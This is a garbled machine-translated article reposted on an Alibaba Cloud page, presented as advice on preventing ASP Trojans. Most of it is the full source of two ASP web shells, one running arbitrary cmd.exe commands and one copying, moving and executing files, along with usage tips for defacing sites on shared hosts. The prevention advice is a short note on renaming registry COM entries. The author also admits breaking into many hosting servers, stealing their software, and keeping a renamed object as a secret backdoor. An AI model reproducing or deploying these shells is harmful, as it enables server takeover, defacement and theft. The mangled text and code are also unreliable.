Prevent ASP Trojans

Source: Internet
Author: User

With the development of ASP technology, more and more websites are developed based on ASP technology on the network. The support for ASP technology is already a basic function of IIS server in windows. However, there are more and more Trojans and backdoors based on ASP technology, and their functions become more and more powerful. Because ASP itself is a tribute service function provided by the server, the trojan and backdoor of this ASP script will not be scanned and killed by anti-virus software. Hackers call it "a backdoor that will never be scanned and killed ". Due to its high concealment and difficulty in detection and removal, it poses a serious threat to website security. Therefore, the prevention and removal of ASP Trojans puts forward higher technical requirements for our network administrators.

Next, based on my personal experience, let's talk about the prevention methods for the two typical ASP Trojans, hoping to help you.
The code for the first Trojan is as follows:
<Title> ASP Shell </title>
<% @ Language = VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
-- Create the COM objects that we will be using --
Set oScript = Server. CreateObject ("WSCRIPT. SHELL ")
Set oScriptNet = Server. CreateObject ("WSCRIPT. NETWORK ")
Set oFileSys = Server. CreateObject ("Scripting. FileSystemObject ")
-- Check for a command that we have posted --
SzCMD = Request. Form (". CMD ")
If (szCMD <> "") Then
-- Use a poor mans pipe... a temp file --
SzTempFile = "C:" & oFileSys. GetTempName ()
Call oScript. Run ("cmd.exe/c" & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys. OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action = "<% = Request. ServerVariables (" URL ") %>" method = "POST">
<Input type = text name = ". CMD" size = 45 value = "<% = szCMD %>">
<Input type = submit value = "Execute Command">
</FORM>
<PRE>

<%
If (IsObject (oFile) Then
-- Read the output from our command and remove the temp file --
On Error Resume Next
Response. Write Server. HTMLEncode (oFile. ReadAll)
OFile. Close
Call oFileSys. DeleteFile (szTempFile, True)
End If
%>
</BODY>
</HTML>
After running:

Enter the DIR command in the command line and execute it to view the directory !! It can use various doscommands, such as copy, net, and netstat.


However, its default execution permission is only GUEST, that is, the execution permission of the IUSR_COMPUTER user. Of course, if you add the IUSR_COMPUTER user to the Administrator group, you have the administrator privilege.

This trojan is convenient to use. It is almost the same as the doscommand line window xx. However, if the server limits FSO (no component upload), it cannot be used. In addition, there is no way to use the virtual host added after the server. It can only be used in "Default Web site", so it has a narrow scope of application.
For the prevention method, let's take a look at its code to know:
Set oScript = Server. CreateObject ("WSCRIPT. SHELL") "creates a WSCRIPT. SHELL object named oScript for command execution"
Set oScriptNet = Server. CreateObject ("WSCRIPT. NETWORK ")
Set oFileSys = Server. CreateObject ("Scripting. FileSystemObject ")
The preceding three lines of code create three objects: WSCRIPT. SHELL, WSCRIPT. NETWORK, and Scripting. FileSystemObject. You only need to rename or delete the items that control WSCRIPT. SHELL objects in the registry. For example:

It is worth noting that the "WSCRIPT. SHELL" item and "WSCRIPT. SHELL.1" item must be renamed or deleted. Because we only modify the "WSCRIPT. SHELL" item. Then hackers only need to modify the code as follows: Set oScript = Server. CreateObject ("WSCRIPT. SHELL.1"), and the backdoor Trojan can be executed again.
You may have already thought that we are. SHELL and WSCRIPT. SHELL.1 "should not be easily guessed by hackers, because, for example, you put" WSCRIPT. SHELL is changed to WSCRIPT. SHELL888 ". Hackers only need to change the code to: Set oScript = Server. CreateObject ("WSCRIPT. SHELL888"), and the trojan program can be executed again. In addition, after the registry is modified, the WEB service must be restarted to make the setting effective.
Next let's take a look at the code of the next ASP backdoor Trojan:
<% Response. write "<font size = 6 color = red> only one xx operation can be executed at a time. </font>" %>
<% Response. write now () %> <BR> physical path of the program:
<% Response. write request. servervariables ("APPL_PHYSICAL_PATH") %>
<Html>
<Title> asps shell. application backdoor </title>
<Body>
<Form action = "<% = Request. ServerVariables (" URL ") %>" method = "POST">
<Input type = text name = text value = "<% = szCMD %>"> enter the directory to be viewed <br>
<Input type = text name = text1 value = "<% = szCMD1 %>">
Copy
<Input type = text name = text2 value = "<% = szCMD2 %>"> <br>
<Input type = text name = text3 value = "<% = szCMD3 %>">
Move
<Input type = text name = text4 value = "<% = sz1_4 %>"> <br>
Path: <input type = text name = text5 value = "<% = sz1_5 %>">
Program: <input type = text name = text6 value = "<% = sz1_6 %>"> <br>
<Input type = submit name = sb value = Send command>
</Form>
</Body>
</Html>
<%
SzCMD = Request. Form ("text") directory browsing
If (szCMD <> "") then
Set shell = server. createobject ("shell. application") create a shell object
Set fod1 = shell. namespace (szcmd)
Set foditems = fod1.items
For each co in foditems
Response. write "<font color = red>" & co. path & "-----" & co. size & "</font> <br>"
Next
End if
%>

<%
SzCMD1 = Request. Form ("text1") Directory copy, file copy is not allowed
SzCMD2 = Request. Form ("text2 ")
If szcmd1 <> "" and szcmd2 <> "then
Set shell1 = server. createobject ("shell. application") create a shell object
Set fod1 = shell1.namespace (szcmd2)
For I = len (szcmd1) to 1 step-1
If mid (szcmd1, I, 1) = "" then
Path = left (szcmd1, I-1)
Exit
End if
Next
If len (path) = 2 then path = path &""
Path2 = right (szcmd1, len (szcmd1)-I)
Set fod2 = shell1.namespace (path)
Set foditem = fod2.parsename (path2)
Fod1.copyhere foditem
Response. write "command completed success! "
End if
%>

<%
SzCMD3 = Request. Form ("text3") Directory move
Sz4244 = Request. Form ("text4 ")
If szcmd3 <> "" and sz1_4 <> "then
Set shell2 = server. createobject ("shell. application") to create a shell object
Set fod1 = shell2.namespace (sz1_4)

For I = len (szcmd3) to 1 step-1
If mid (szcmd3, I, 1) = "" then
Path = left (szcmd3, I-1)
Exit
End if
Next

If len (path) = 2 then path = path &""
Path2 = right (szcmd3, len (szcmd3)-I)
Set fod2 = shell2.namespace (path)
Set foditem = fod2.parsename (path2)
Fod1.movehere foditem
Response. write "command completed success! "
End if
%>
<%
Sz1_5 = Request. Form ("text5") specifies the path for the execution program.
Sz1_6 = Request. Form ("text6 ")
If sz1_5 <> "" and sz1_6 <> "then
Set shell3 = server. createobject ("shell. application") to create a shell object
Shell3.namespace (sz%5). items. item (sz%6). invokeverb
Response. write "command completed success! "
End if
%>
After execution, for example:

To view the directory, just enter the corresponding directory and click send command. For example:

This Trojan can COPY, MOVE, and execute programs. However, many commands are unavailable, such as del, net, and netstat. This trojan is simple, but it is enough to use it to hack a website. For example, we can MOVE the home page of the website to another place, and then COPY a hacker webpage with the same name.
The most terrible thing is that this trojan applies to any virtual host. That is to say, as long as I am a user of a virtual space on the server, I can upload this trojan, use it to modify the homepage of any other user. So if the service provider that provides the virtual space has not been patched, it is really dead.
However, in my practice, many virtual space service providers in China, especially some small service providers, have not been patched. I used this vulnerability to get the ADMIN of many virtual space servers and helped them fix the vulnerability. Of course, I also got what I wanted-a lot of good software and code. Many of the ASP programs I use today are stolen from them, which is hard to hear. It should be said that they are DOWN.
To put it bluntly, how should we prevent this ASP backdoor Trojan? Let's take a look at the code in this sentence: set shell = server. createobject ("shell. application"), which is the same as the method just now, for example:


You only need to rename or delete the "shell. application" and "shell. application.1" items. Remember, if you change your name, you need to make it more complex. Don't let the hackers just guess it. By the way, it is recommended that you change the name of a zombie and write down the name. In this way, it becomes a secret backdoor.

Finally, I would like to summarize the two ASP Trojan Horse backdoors and how to prevent the ASP Trojan Horse backdoors: The first Trojan is more powerful, but has a narrow application scope and requires FSO support, that is, "Script ".

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.